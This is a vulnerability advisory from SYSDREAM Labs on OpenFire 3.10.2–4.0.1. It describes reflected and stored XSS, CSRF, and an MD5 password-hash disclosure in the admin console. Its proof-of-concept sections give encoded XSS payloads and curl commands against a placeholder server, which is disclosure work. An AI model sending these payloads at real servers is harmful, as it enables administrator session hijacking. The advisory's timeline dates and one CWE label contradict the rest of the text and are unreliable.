# Several vulnerabilities doscovered in OpenFire version 3.10.2 to 4.0.1 ## Product Description **OpenFire** is an opensource project under GNU GPL licence. It provides a Jabber/XMPP server fully develloped in Java. It's develloped by the **Ignite realtime** community. The actual version of the product is 4.0.2. Official web site : http://igniterealtime.org/ Several vulnerabilities have been discovered between 2015, October and 2016, February. Reported vulnerabilities are similar to those previously discovered by hyp3rlinx, although they concern different pages. In brief, the flaws are of the following kinds: CSRF, XSS (reflected and stored), file upload and information disclosure. Most vulnerabilities need an administration access to the web application and may lead to personal information leakage or account take-over. **Ingnite realtime** fixed some vulnerabilities (the corresponding commit ID are indicated in this document). ## Several Relected XSS Vulnerabilities identified in Openfire 3.10.2 **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-79 **CVSS Base Score**: 5.2 [comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O ### Vulnerability Description Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS may lead to session hijacking on admin user. ### Proof of Concept #### *domain* and *remotePort* variables from *server2server-settings.jsp* The following POST values can be sent to trigger the vulnerability: ``` domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server ``` or ``` domain=testt&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server ``` or ``` domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server ``` You can reproduce the exploitation with the following curl commands: ``` curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" curl --data "domain=test&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" ``` #### *criteria* variable from *plugins/search/advance-user-search.jsp* The following GET request exploits the XSS vulnerability: ``` http://OpenFireServerIP:9090/[[http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search ``` ## Several stored XSS Vulnerabilities identified in Openfire 3.10.2 **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-79 **CVSS Base Score**: 5.5 [comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O ### Vulnerability Description Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user. ### Proof of Concept #### *mucdesc* variable from *muc-service-edit-form.jsp* The following POST values can be sent to trigger the vulnerability: ``` save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E ``` The following code allows the creation of a web frame exploiting the vulnerability: ```
``` or with this curl command: ``` curl --data "save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX" ``` #### *searchname* variable from *plugins/search/search-props-edit-form.jsp* The following POST values can be sent to trigger the vulnerability: ``` searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false ``` The following code allows the creation of a web frame exploiting the vulnerability: ```
``` or with this curl command: ``` curl "http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp" --data="searchEnabled=true&searchname=%22/%3E%3Cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false" --cookie="JSESSIONID=XXX" ``` #### *searchname* variable from *page plugins/search/search-props-edit-form.jsp* The following POST values can be sent to trigger the vulnerability: ``` propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property ``` The following code allows the creation of a web frame exploiting the vulnerability: ```
``` or with this curl command: ``` curl --data "searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false" https://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp --cookie="JSESSIONID=XXX" ``` #### *serverName* variable from *plugins/search/search-props-edit-form.jsp* The following POST values can be sent to trigger the vulnerability: ``` serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties ``` The following code allows the creation of a web frame exploiting the vulnerability: ```
``` or with this curl command: ``` curl --data "serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties" https://OpenFireServerIP:9090/server-props.jsp --cookie="JSESSIONID=XXX" ``` ### Affected versions * Version >= 3.10.2 and < 4.0.0 ## Several Relected XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1 **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-79 **CVSS Base Score**: 5.2 [comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O ### Vulnerability Description Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS could lead to session hijacking against an administrator. Some of these vulnerabilities have already been found by hyp3rlinx, but had not been patched properly. ### Proof of Concept #### *groupchatName*, *groupchatJID*, *users* and *groups* variables from *page create-bookmark.jsp* suffer from the vulnerability The following POST values can be sent to trigger the vulnerability: ``` groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS1%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat ``` The following curl command allows reproducing the attack against the Openfire *plugins/bookmarks/create-bookmark.jsp* page: ``` curl --data "save=true&mucname=conference&mucdesc=Public+Chatrooms%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX" ``` #### *search* variable from *group-summary.jsp* The following GET request exploit the XSS vulnerability: ``` http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 ``` The following curl command allows reproducing the attack against the Openfire *group-summary.jsp* page. ``` curl http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 --cookie="JSESSIONID=XXX" ``` #### *maxTotalSize*, *maxFileSize*, *maxDays*, *logTimeout* variables from *audit-policy.jsp* The following GET request exploit the XSS vulnerability: ``` http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings ``` The following curl command allows reproducing the attack against the Openfire *audit-policy.jsp* page: ``` curl "http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings" --cookie="JSESSIONID=XXX" ``` #### *passPhrase* variables from *import-keystore-certificate.jsp* The following POST values exploit the XSS vulnerability: ``` passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save ``` The following curl command allows reproducing the attack against the Openfire *import-keystore-certificate.jsp* page. ``` curl http://OpenFireServerIP:9090/import-keystore-certificate.jsp --data="passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save" --cookie="JSESSIONID=XXX" ``` #### *criteria* variable from */plugins/search/advance-user-search.jsp* The following GET request exploit the XSS vulnerability: ``` http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search ``` The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* admin page. ``` curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX" ``` ### Affected versions * Version 4.0.0 and 4.0.1 ## Several stored XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1 Some of these vulnerabilities have already been found by hyp3rlinx, but has not been patched since. **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-79 **CVSS Base Score**: 5.5 [comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O ### Vulnerability Description Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user. ### Proof of Concept #### *subdomain* variable from *connection-settings-external-components.jsp* The following curl command allows reproducing the attack against the Openfire *connection-settings-external-components.jsp* page: ``` curl --data "subdomain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&secret=toto&componentAllowed=Add+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX" ``` Or ``` curl --data "subdomain=%22%3Escript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&componentBlocked=Block+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX" ``` #### *mucdesc* variable from *muc-service-edit-form.jsp* The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page: ``` curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX" ``` #### *groupchatName*, *groupchatJID*, *users* and *groups* variables from page muc-service-edit-form.jsp The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page: ``` curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX" ``` #### *searchname* variable from *plugins/search/search-props-edit-form.jsp* The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* page: ``` curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX" ``` The folling code allows exploiting the vulnerability: ```
``` #### *propValue* variable from *server-properties.jsp* The following curl command allows reproducing the attack against the Openfire *server-properties.jsp* page: ``` curl --data="propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property" http://OpenFireServerIP:9090/server-properties.jsp --cookie="JSESSIONID=XXX" ``` The folling code allows exploiting the vulnerability: ```
``` ###Affected versions * Version 4.0.0 and 4.0.1 ## Several CSRF Vulnerabilities identified in Openfire 3.10.2 **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-312 **CVSS Base Score**: 5.4 [comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O ### Vulnerability Description Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Throught this attack an attacker could drive a valid user to execute unwittingly a request on the OpenFire sever. ### Proof of Concept #### *connection-settings-external-components.jsp* page is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page: ```
``` #### *client-connections-settings.jsp* is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page: ```
``` #### *manage-updates.jsp* is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the *Openfire manage-updates.jsp* page: ```
``` #### *plugin-admin.jsp* is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the Openfire *plugin-admin.jsp* page. ```
``` The following HTML iframe command allows reproducing the attack against the Openfire *reg-settings.jsp* page: ```
``` #### *server-properties.jsp* is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the Openfire *server-properties.jsp* admin page. ```
``` #### *system-email.jsp* is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the Openfire *system-email.jsp* admin page. ```
``` ### Affected versions * Version >= 3.10.2 and < 4.0.0 ## Several CSRF Vulnerabilities identified in Openfire 3.10.2 **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-312 **CVSS Base Score**: 5.4 [comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O ### Vulnerability Description Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Through this attack, an attacker could drive a valid user to execute unwittingly a request to the OpenFire sever. These vulnerabilities have already been found by hyp3rlinx, but had not been patched yet. ### Proof of Concept #### *connection-settings-external-components.jsp* is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page: ```
``` #### *client-connections-settings.jsp* is vulerable to a CSRF attack. The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page. ```
``` ### Affected versions * Version 4.0.0 and 4.0.1 ## Sensitive information disclosure in OpenFire Server <=3.10.2 **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-200 **CVSS Base Score**: 5.5 [comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O ### Vulnerability Description A sensitive information disclosure vulnerabilty is present in the page *system-email.jsp*. It allow's an authenticated user to retreive the md5 hash the password of an email account. ### Vulnerable code The following HTML code is reveived by an authenticated user on the page system-email.jsp. The md5 hash of the password is sent to the user. ``` Server Username (Optional): Server Password (Optional): ``` ### Affected versions * Version >=3.10.2 and <4.0.2 ### Fixes * https://github.com/igniterealtime/Openfire/pull/570 ### Solution Update to version 4.0.2 ### Timeline (dd/mm/yyyy) * 15/10/2014 : Initial discovery * 19/10/2015 : Contact with vendor team * 27/11/2014 : vendor fixes vulnerabilities * 27/11/2014 : vendor releases version 4.0.2, which includes the fixes ## Credits * Florian Nivette -- SYSDREAM Labs GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream